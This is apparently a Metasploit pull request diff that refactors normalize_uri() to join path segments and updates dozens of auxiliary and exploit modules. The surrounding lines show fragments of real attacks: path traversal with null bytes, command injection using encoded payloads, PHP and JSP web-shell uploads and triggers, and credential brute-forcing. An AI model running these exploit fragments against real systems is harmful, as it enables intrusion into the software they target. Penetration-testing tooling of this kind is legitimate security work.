### PR TITLE
Improves normalize_uri(), and updates modules that are using it

### DIFF
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -539,23 +539,18 @@ module Exploit::Remote::HttpClient
 	# Returns a modified version of the URI that:
 	# 1. Always has a starting slash
 	# 2. Removes all the double slashes
-	# 3. Removes the trailing slash
 	#
-	def normalize_uri(str)
+	def normalize_uri(*strs)
+		new_str = strs * "/"
+
+		new_str = new_str.gsub!("//", "/") while new_str.index("//")
+
 		# Makes sure there's a starting slash
-		unless str.to_s[0,1] == "/"
-			str = "/" + str.to_s
+		unless new_str[0,1] == '/'
+			new_str = '/' + new_str
 		end
 
-		# Removes all double slashes
-		str = str.gsub!("//", "/") while str.index("//")
-
-		# Makes sure there's no trailing slash
-		unless str.length == 1
-			str = str.gsub(/\/+$/, '')
-		end
-
-		str
+		new_str
 	end
 
 	#

--- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
+++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb
@@ -96,7 +96,9 @@ class Metasploit4 < Msf::Auxiliary
 		juhash = Digest::MD5.hexdigest(juarray)
 		juhash = juhash[0..9] # shortMD5 value for use as juhash
 
-		file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
+		uri_base_path = normalize_uri(uri, '/index.php')
+
+		file_uri = "#{uri_base_path}?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
 		vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
 
 		begin

--- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb
+++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb
@@ -47,8 +47,8 @@ class Metasploit3 < Msf::Auxiliary
 	def run
 		print_status("Establishing a connection to the target...")
 
-		uri = normalize_uri(datastore['URI'])
-		rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode="
+		uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php')
+		rpath = uri + "?days=1&offset=0&sort_mode="
 
 		res = send_request_raw({
 			'uri'     => rpath,

--- a/modules/auxiliary/dos/http/webrick_regex.rb
+++ b/modules/auxiliary/dos/http/webrick_regex.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run
 		begin
 			o = {
-				'uri' => normalize_uri(datastore['URI']) || '/',
+				'uri' => normalize_uri(datastore['URI']),
 				'headers' => {
 					'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
 				}

--- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Auxiliary
 				key="w3tc_#{host}_#{site_id}_sql_#{query_md5}"
 				key_md5 = ::Rex::Text.md5(key)
 				hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}"
-				url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache")
+				url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache")
 				uri << hash_path
 
 				result = nil

--- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
 					"uri"      => user_url,
 					"method"   => "GET",
 					"vars_get" => {
-						"author" => user_id
+						"author" => user_id.to_s
 					}
 				})
 

--- a/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
+++ b/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run_host(ip)
 
 		print_status("#{rhost}:#{rport} - Sending request...")
-		uri = normalize_uri(target_uri.to_s)
+		uri = normalize_uri(target_uri.path)
 		res = send_request_cgi({
 			'uri'          => uri,
 			'method'       => 'GET',

--- a/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/atlassian_crowd_fileaccess.rb
@@ -57,7 +57,7 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def run_host(ip)
-		uri = normalize_uri(target_uri.to_s)
+		uri = normalize_uri(target_uri.path)
 		res = send_request_cgi({
 			'uri'     => uri,
 			'method'  => 'GET'})
@@ -71,7 +71,7 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def accessfile(rhost)
-		uri = normalize_uri(target_uri.to_s)
+		uri = normalize_uri(target_uri.path)
 		print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
 
 		soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'

--- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb
+++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb
@@ -49,8 +49,7 @@ class Metasploit3 < Msf::Auxiliary
 
 
 	def run_host(ip)
-		base = normalize_uri(target_uri.path)
-		base << '/' if base[-1,1] != '/'
+		base = target_uri.path
 
 		peer = "#{ip}:#{rport}"
 		fname = datastore['FILE']
@@ -61,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
 		res = send_request_cgi({
 			'method'        => 'GET',
 			'encode_params' => false,
-			'uri'           => "#{base}gmap/view_overlay.php",
+			'uri'           => normalize_uri(base, "gmap/view_overlay.php"),
 			'vars_get'      => {
 				'overlay_type' => "#{traverse}#{fname}%00"
 			}

--- a/modules/auxiliary/scanner/http/clansphere_traversal.rb
+++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb
@@ -46,7 +46,6 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 		base = normalize_uri(target_uri.path)
-		base << '/' if base[-1,1] != '/'
 
 		peer = "#{ip}:#{rport}"
 
@@ -58,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{base}index.php",
+			'uri'    => normalize_uri(base, "index.php"),
 			'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png"
 		})
 

--- a/modules/auxiliary/scanner/http/concrete5_member_list.rb
+++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb
@@ -44,10 +44,10 @@ class Metasploit4 < Msf::Auxiliary
 	end
 
 	def run_host(rhost)
-		url = normalize_uri(datastore['URI'])
+		url = normalize_uri(datastore['URI'], '/index.php/members')
 
 		begin
-			res = send_request_raw({'uri' => "#{url}/index.php/members"})
+			res = send_request_raw({'uri' => url})
 
 		rescue ::Rex::ConnectionError
 			print_error("#{peer} Unable to connect to #{url}")

--- a/modules/auxiliary/scanner/http/dolibarr_login.rb
+++ b/modules/auxiliary/scanner/http/dolibarr_login.rb
@@ -112,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		@uri = normalize_uri(target_uri)
+		@uri = normalize_uri(target_uri.path)
 		@uri.path << "/" if @uri.path[-1, 1] != "/"
 		@peer = "#{rhost}:#{rport}"
 

--- a/modules/auxiliary/scanner/http/glassfish_login.rb
+++ b/modules/auxiliary/scanner/http/glassfish_login.rb
@@ -218,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		#Get GlassFish version
 		edition, version, banner = get_version(res)
-		path = normalize_uri(target_uri)
+		path = normalize_uri(target_uri.path)
 		target_url = "http://#{rhost.to_s}:#{rport.to_s}/#{path.to_s}"
 		print_status("#{target_url} - GlassFish - Attempting authentication")
 

--- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
@@ -60,8 +60,10 @@ class Metasploit4 < Msf::Auxiliary
 
 		print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
 
+		uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
+
 		res = send_request_cgi({
-			'uri'     => "#{@uri}services/APISiteScopeImpl",
+			'uri'     => uri,
 			'method'  => 'GET'})
 
 		if not res
@@ -91,8 +93,10 @@ class Metasploit4 < Msf::Auxiliary
 
 		print_status("#{@peer} - Retrieving the SiteScope Configuration")
 
+		uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
+
 		res = send_request_cgi({
-			'uri'      => "#{@uri}services/APISiteScopeImpl",
+			'uri'      => uri,
 			'method'   => 'POST',
 			'ctype'    => 'text/xml; charset=UTF-8',
 			'data'     => data,

--- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
+++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb
@@ -59,8 +59,10 @@ class Metasploit4 < Msf::Auxiliary
 
 		print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
 
+		uri = normalize_uri(@uri, 'services/APIMonitorImpl')
+
 		res = send_request_cgi({
-			'uri'     => "#{@uri}services/APIMonitorImpl",
+			'uri'     => uri,
 			'method'  => 'GET'})
 
 		if not res
@@ -95,8 +97,10 @@ class Metasploit4 < Msf::Auxiliary
 
 		print_status("#{@peer} - Retrieving the file contents")
 
+		uri = normalize_uri(@uri, 'services/APIMonitorImpl')
+
 		res = send_request_cgi({
-			'uri'      => "#{@uri}services/APIMonitorImpl",
+			'uri'      => uri,
 			'method'   => 'POST',
 			'ctype'    => 'text/xml; charset=UTF-8',
 			'data'     => data,

--- a/modules/auxiliary/scanner/http/http_put.rb
+++ b/modules/auxiliary/scanner/http/http_put.rb
@@ -81,7 +81,7 @@ class Metasploit4 < Msf::Auxiliary
 		begin
 			res = send_request_cgi(
 				{
-					'uri'    => path,
+					'uri'    => normalize_uri(path),
 					'method' => 'PUT',
 					'ctype'  => 'text/plain',
 					'data'   => data,
@@ -102,7 +102,7 @@ class Metasploit4 < Msf::Auxiliary
 		begin
 			res = send_request_cgi(
 				{
-					'uri'    => path,
+					'uri'    => normalize_uri(path),
 					'method' => 'DELETE',
 					'ctype'  => 'text/html',
 				}, 20
@@ -119,7 +119,7 @@ class Metasploit4 < Msf::Auxiliary
 	# Main function for the module, duh!
 	#
 	def run_host(ip)
-		path   = normalize_uri(datastore['PATH'])
+		path   = datastore['PATH']
 		data   = datastore['FILEDATA']
 
 		if path[-1,1] != '/'

--- a/modules/auxiliary/scanner/http/s40_traversal.rb
+++ b/modules/auxiliary/scanner/http/s40_traversal.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		uri = normalize_uri(target_uri.path)
+		uri = target_uri.path
 		uri << '/' if uri[-1, 1] != '/'
 
 		t = "/.." * datastore['DEPTH']
@@ -52,9 +52,10 @@ class Metasploit3 < Msf::Auxiliary
 		print_status("Retrieving #{datastore['FILE']}")
 
 		# No permission to access.log or proc/self/environ, so this is all we do :-/
+		uri = normalize_uri(uri, 'index.php')
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{uri}index.php/?p=#{t}#{datastore['FILE']}%00"
+			'uri'    => "#{uri}/?p=#{t}#{datastore['FILE']}%00"
 		})
 
 		if not res

--- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
 
 		begin
 			res = send_request_raw({
-				'uri'     => normalize_uri(datastore['URI']) + "/services/Session",
+				'uri'     => normalize_uri(datastore['URI'], "/services/Session"),
 				'method'  => 'POST',
 				'data'	  => data,
 				'headers' =>

--- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 		res = send_request_cgi({
-			'uri'    => normalize_uri(datastore['URI']) + "/services/listServices",
+			'uri'    => normalize_uri(datastore['URI'], "/services/listServices"),
 			'method' => 'GET'
 		}, 25)
 		return if not res

--- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb
+++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
 
 	def run_host(ip)
 		res = send_request_cgi({
-			'uri'    => normalize_uri(datastore['URI']) + "/services/listServices",
+			'uri'    => normalize_uri(datastore['URI'], "/services/listServices"),
 			'method' => 'GET'
 		}, 25)
 		return if not res or res.code != 200

--- a/modules/auxiliary/scanner/http/vcms_login.rb
+++ b/modules/auxiliary/scanner/http/vcms_login.rb
@@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary
 	end
 
 	def run
-		@uri = normalize_uri(target_uri)
+		@uri = normalize_uri(target_uri.path)
 		@uri.path << "/" if @uri.path[-1, 1] != "/"
 		@peer = "#{rhost}:#{rport}"
 

--- a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
+++ b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
 		register_options(
 			[
 				Opt::RPORT(9084),
-				OptString.new('URIPATH', [true, 'URI path to the downloads/', '/vci/downloads/']),
+				OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
 				OptString.new('FILE', [true, 'Define the remote file to download', 'boot.ini'])
 			], self.class)
 	end
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
 	def run_host(ip)
 		fname     = File.basename(datastore['FILE'])
 		traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
-		uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE']
+		uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
 
 		print_status("#{rhost}:#{rport} - Requesting: #{uri}")
 

--- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb
+++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb
@@ -115,7 +115,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		@uri = normalize_uri(target_uri)
+		@uri = target_uri
 		@uri.path << "/" if @uri.path[-1, 1] != "/"
 		peer = "#{rhost}:#{rport}"
 
@@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Sending malicious request...")
 		res = send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => @uri.path + "admin/tools/export.php",
+			'uri'       => normalize_uri(@uri.path, "admin/tools/export.php"),
 			'cookie'    => sid,
 			'vars_post' => {
 				'token'             => token,

--- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = normalize_uri(target_uri.path)
+		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Sending Command injection")
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}spywall/ipchange.php",
+			'uri'    => normalize_uri(uri, 'spywall/ipchange.php'),
 			'data'   => post_data
 		})
 

--- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
+++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = normalize_uri(target_uri.path)
+		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 
 		peer = "#{rhost}:#{rport}"
@@ -97,7 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Sending PHP payload (#{payload_name})")
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}spywall/blocked_file.php",
+			'uri'    => normalize_uri(uri, "spywall/blocked_file.php"),
 			'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
 			'data'   => post_data.to_s
 		})

--- a/modules/exploits/linux/http/vcms_upload.rb
+++ b/modules/exploits/linux/http/vcms_upload.rb
@@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		peer = "#{rhost}:#{rport}"
 
-		base = normalize_uri(target_uri.path)
+		base = target_uri.path
 		base << '/' if base[-1,1] != '/'
 
 		@payload_name = "#{rand_text_alpha(5)}.php"
@@ -94,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("#{peer} Uploading payload: #{@payload_name}")
 		res = send_request_cgi({
-			'uri'    => "#{base}includes/inline_image_upload.php",
+			'uri'    => normalize_uri(base, 'includes/inline_image_upload.php'),
 			'method' => 'POST',
 			'ctype'  => 'multipart/form-data; boundary=----x',
 			'data'   => post_data

--- a/modules/exploits/linux/http/webcalendar_settings_exec.rb
+++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb
@@ -73,8 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		peer = "#{rhost}:#{rport}"
 
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1, 1] != '/'
+		uri = target_uri.path
 
 		print_status("#{peer} - Housing php payload...")
 
@@ -86,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		post_data << "\n"*2
 		send_request_cgi({
 			'method'    => 'POST',
-			'uri'       => "#{uri}install/index.php",
+			'uri'       => normalize_uri(uri, 'install/index.php'),
 			'data'      => post_data
 		})
 
@@ -95,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Execute our payload
 		send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{uri}includes/settings.php",
+			'uri'    => normalize_uri(uri, 'includes/settings.php'),
 			'headers' => {
 				'Cmd' => Rex::Text.encode_base64(payload.encoded)
 			}

--- a/modules/exploits/linux/http/webid_converter.rb
+++ b/modules/exploits/linux/http/webid_converter.rb
@@ -55,12 +55,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(target_uri.path)
+		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => uri + "docs/changes.txt"
+			'uri'    => normalize_uri(uri, "docs/changes.txt")
 		})
 
 		if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/
@@ -122,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 
-		uri = normalize_uri(target_uri.path)
+		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 		peer = "#{rhost}:#{rport}"
 
@@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Injecting the PHP payload")
 
 		response = send_request_cgi({
-			'uri' => uri + "converter.php",
+			'uri' => normalize_uri(uri, "converter.php"),
 			'method' => "POST",
 			'vars_post' => {
 				"action" => "convert",
@@ -149,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		timeout = 0.01
 		response = send_request_cgi({
-				'uri' => uri + "includes/currencies.php",
+				'uri' => normalize_uri(uri, "includes/currencies.php"),
 				'method' => "GET",
 				'headers' => {
 						'Connection' => "close",

--- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
+++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb
@@ -57,13 +57,13 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(target_uri.path)
+		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 		clue = Rex::Text::rand_text_alpha(rand(5) + 5)
 
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'      => "#{uri}plugins/access.ssh/checkInstall.php",
+			'uri'      => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'),
 			'vars_get' => {
 				'destServer'    => "||echo #{clue}"
 			}
@@ -79,13 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		peer = "#{rhost}:#{rport}"
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
+		uri = target_uri.path
 
 		# Trigger the command execution bug
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'      => "#{uri}plugins/access.ssh/checkInstall.php",
+			'uri'      => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"),
 			'vars_get' =>
 				{
 					'destServer'    => "||#{payload.encoded}"

--- a/modules/exploits/multi/http/apprain_upload_exec.rb
+++ b/modules/exploits/multi/http/apprain_upload_exec.rb
@@ -59,12 +59,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def check
-		uri = normalize_uri(target_uri.path)
+		uri = target_uri.path
 		uri << '/' if uri[-1,1] != '/'
 
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{uri}addons/uploadify/uploadify.php"
+			'uri'    => normalize_uri(uri, 'addons/uploadify/uploadify.php')
 		})
 
 		if res and res.code == 200 and res.body.empty?
@@ -75,8 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
+		uri = target_uri.path
 
 		peer = "#{rhost}:#{rport}"
 		payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php'
@@ -91,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{peer} - Sending PHP payload (#{payload_name})")
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{uri}addons/uploadify/uploadify.php",
+			'uri'    => normalize_uri(uri, "addons/uploadify/uploadify.php"),
 			'ctype'  => 'multipart/form-data; boundary=o0oOo0o',
 			'data'   => post_data
 		})
@@ -107,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Execute our payload
 		res = send_request_cgi({
 			'method' => 'GET',
-			'uri'    => "#{uri}addons/uploadify/uploads/#{payload_name}"
+			'uri'    => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}")
 		})
 
 		# If we don't get a 200 when we request our malicious payload, we suspect

--- a/modules/exploits/multi/http/auxilium_upload_exec.rb
+++ b/modules/exploits/multi/http/auxilium_upload_exec.rb
@@ -56,11 +56,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def check
-		uri = normalize_uri(target_uri.path)
-		uri << '/' if uri[-1,1] != '/'
+		uri = target_uri.path
 		base = File.dirname("#{uri}.")
 
-		res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"})
+		res = send_request_raw({
+			'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php")
+		})
 		if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/
 			return Exploit::CheckCode::Appears
 		else
@@ -83,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...")
 		res = send_request_cgi({
 			'method' => 'POST',
-			'uri'    => "#{base}/admin/sitebanners/upload_banners.php",
+			'uri'    => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"),
 			'ctype'  => "multipart/form-data; boundary=#{data.bound}",
 			'data'   => post_data,
 		})
@@ -94,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		print_status("#{@peer} - Requesting '#{php_fname}'...")
-		res = send_request_raw({'uri'=>"#{base}/banners/#{php_fname}"})
+		res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")})
 		if res and res.code == 404
 			print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}")
 			return

--- a/modules/exploits/multi/http/axis2_deployer.rb
+++ b/modules/exploits/multi/http/axis2_deployer.rb
@@ -267,7 +267,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			res = send_request_cgi(
 				{
 					'method' => 'POST',
-					'uri'    => "#{rpath}/axis2-admin/login",
+					'uri'    => normalize_uri(rpath, '/axis2-admin/login'),
 					'ctype'  => 'application/x-www-form-urlencoded',
 					'data'   => "userName=#{user}&password=#{pass}&submit=+Login+",
 				}, 25)
@@ -303,7 +303,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				res = send_request_cgi(
 					{
 						'method' => 'POST',
-						'uri'    => "#{rpath}/axis2-admin/login",
+						'uri'    => normalize_uri(rpath, '/axis2-admin/login'),
 						'ctype'  => 'application/x-www-form-urlencoded',
 						'data'   => "userName=#{user}&password=#{pass}&submit=+Login+",
 					}, 25)

--- a/modules/exploits/multi/http/cuteflow_upload_exec.rb
+++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		base << '/' if base[-1, 1] != '/'
 		res = send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{base}"
+			'uri'    => base
 		})
 
 		if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/
@@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# upload
 		res = send_request_cgi({
 			'method'  => 'POST',
-			'uri'     => "#{base}pages/restart_circulation_values_write.php",
+			'uri'     => normalize_uri(base, "pages/restart_circulation_values_write.php"),
 			'ctype'   => "multipart/form-data; boundary=#{boundary}",
 			'data'    => data_post,
 		})
@@ -117,7 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{@peer} - Retrieving file: #{fname}")
 		send_request_raw({
 			'method' => 'GET',
-			'uri'    => "#{base}upload/___1/#{fname}"
+			'uri'    => normalize_uri(base, "upload/___1/#{fname}")
 		})
 
 		handler

--- a/modules/exploits/multi/http/horde_href_backdoor.rb
+++ b/modules/exploits/multi/http/horde_href_backdoor.rb
@@ -59,14 +59,14 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def exploit
 		# Make sure the URI begins with a slash
-		uri = normalize_uri(datastore['URI'])
+		uri = datastore['URI']
 
 		function = "passthru"
 		key = Rex::Text.rand_text_alpha(6)
 		arguments = "echo #{key}`"+payload.raw+"`#{key}"
 
 		res = send_request_cgi({
-			'uri'     => uri + "/services/javascript.php",
+			'uri'     => normalize_uri(uri, "/services/javascript.php"),
 			'method'  => 'POST',
 			'ctype'   => 'application/x-www-form-urlencoded',
 			'data'    => "app="+datastore['APP']+"&file=open_calendar.js",

--- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb
@@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Generate an initial JSESSIONID
 		print_status("#{@peer} - Retrieving an initial JSESSIONID")
 		res = send_request_cgi(
-			'uri'    => "#{@uri}servlet/Main",
+			'uri'    => normalize_uri(@uri, 'servlet/Main'),
 			'method' => 'POST'
 		)
 
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{@peer} - Authenticating on HP SiteScope Configuration")
 		res = send_request_cgi(
 			{
-				'uri'    => "#{@uri}j_security_check",
+				'uri'    => normalize_uri(@uri, 'j_security_check'),
 				'method' => 'POST',
 				'data'   => login_data,
 				'ctype'  => "application/x-www-form-urlencoded",
@@ -264,7 +264,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("#{@peer} - Uploading the JSP")
 		res = send_request_cgi(
 			{
-				'uri'    => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
+				'uri'    => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true",
 				'method' => 'POST',
 				'data'   => post_data.to_s,
 				'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
@@ -285,7 +285,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...")
 		send_request_cgi(
 			{
-				'uri'    => "#{@uri}#{@jsp_name}.jsp",
+				'uri'    => normalize_uri(@uri, "#{@jsp_name}.jsp"),
 				'method' => 'GET',
 				'headers' =>
 					{
@@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		data << "</wsns0:Envelope>" + "\r\n"
 
 		res = send_request_cgi({
-			'uri'      => "#{@uri}services/APIPreferenceImpl",
+			'uri'      => normalize_uri(@uri, 'services/APIPreferenceImpl'),
 			'method'   => 'POST',
 			'ctype'    => 'text/xml; charset=UTF-8',
 			'data'     => data,

--- a/modules/exploits/multi/http/jboss_bshdeployer.rb
+++ b/modules/exploits/multi/http/jboss_bshdeployer.rb
@@ -391,7 +391,7 @@ EOT
 	end
 
 	def query_serverinfo
-		path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
+		path = normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo')
 		res = send_request_raw(
 			{
 				'uri'    => path,
@@ -449,13 +449,13 @@ EOT
 		if (datastore['VERB']== "POST")
 			res = send_request_cgi({
 				'method'	=> datastore['VERB'],
-				'uri'		=> normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
+				'uri'		=> normalize_uri(datastore['PATH'], '/HtmlAdaptor'),
 				'data'	=> params
 			})
 		else
 			res = send_request_cgi({
 				'method'	=> datastore['VERB'],
-				'uri'		=> normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params
+				'uri'		=> normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{params}"
 			}, 30)
 		end
 		res

